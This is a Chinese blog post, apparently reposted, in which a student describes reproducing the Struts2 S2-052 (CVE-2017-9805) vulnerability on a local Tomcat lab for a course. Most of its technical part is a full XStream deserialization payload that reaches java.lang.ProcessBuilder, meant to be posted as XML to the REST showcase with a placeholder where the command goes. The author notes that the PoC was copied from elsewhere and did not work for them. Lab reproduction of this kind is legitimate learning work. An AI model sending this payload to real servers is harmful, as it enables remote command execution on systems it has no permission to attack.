码迷,mamicode.com
首页 > 其他好文 > 详细

CVE-2017-9805(S2-052)漏洞复现

时间:2020-01-09 21:15:06      阅读:132      评论:0      收藏:0      [点我收藏+]

标签:data   collect   flags   alt   nta   tom   本地   star   error   

1.前言

  这学期的工程实践要求复现一个漏洞,随便选了一个看起来蛮简单的Struts2-052,结果是虽然很简单但是我还是做了好久(我好菜啊QAQ)。我使用的系统是ubuntu

2.搭建环境

 

  java

  https://www.cnblogs.com/lamp01/p/8932740.html

  tomcat

  https://www.cnblogs.com/yuhebin/p/8594774.html

3.实现漏洞

   访问:http://127.0.0.1:8080/struts2-rest-showcase/ (如果burp抓不了本地包可以用ip代替,我的就抓不了,也不知道咋回事……)  

 

                                         技术图片

              

  edit进行编译页面,然后提交,并用burp抓包。

 

  修改包如下:

  将: 

  Content-Type: application/x-www-form-urlencoded 修改为:

 

  Content-Type: application/xml

 

  post数据改成:

 

<map>

<entry>

<jdk.nashorn.internal.objects.NativeString><flags>0</flags> <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> <dataHandler> <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"> <is class="javax.crypto.CipherInputStream"> <cipher class="javax.crypto.NullCipher"> <initialized>false</initialized> <opmode>0</opmode> <serviceIterator class="javax.imageio.spi.FilterIterator"> <iter class="javax.imageio.spi.FilterIterator"> <iter class="java.util.Collections$EmptyIterator"/> <next class="java.lang.ProcessBuilder"> <command> <string>命令代码</string> </command> <redirectErrorStream>false</redirectErrorStream> </next> </iter> <filter class="javax.imageio.ImageIO$ContainsFilter"> <method> <class>java.lang.ProcessBuilder</class> <name>start</name> <parameter-types/> </method> <name>foo</name> </filter> <next class="string">foo</next> </serviceIterator> <lock/> </cipher> <input class="java.lang.ProcessBuilder$NullInputStream"/> <ibuffer></ibuffer> <done>false</done> <ostart>0</ostart> <ofinish>0</ofinish> <closed>false</closed> </is> <consumed>false</consumed> </dataSource> <transferFlavors/> </dataHandler> <dataLen>0</dataLen> </value> </jdk.nashorn.internal.objects.NativeString> <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/> </entry> <entry> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>

 

</entry>

 

 

</map>

 

 poc是网上抄的,但是我不知道为什么无法实现,还在找原因。

CVE-2017-9805(S2-052)漏洞复现

标签:data   collect   flags   alt   nta   tom   本地   star   error   

原文地址:https://www.cnblogs.com/fungus399/p/12173254.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!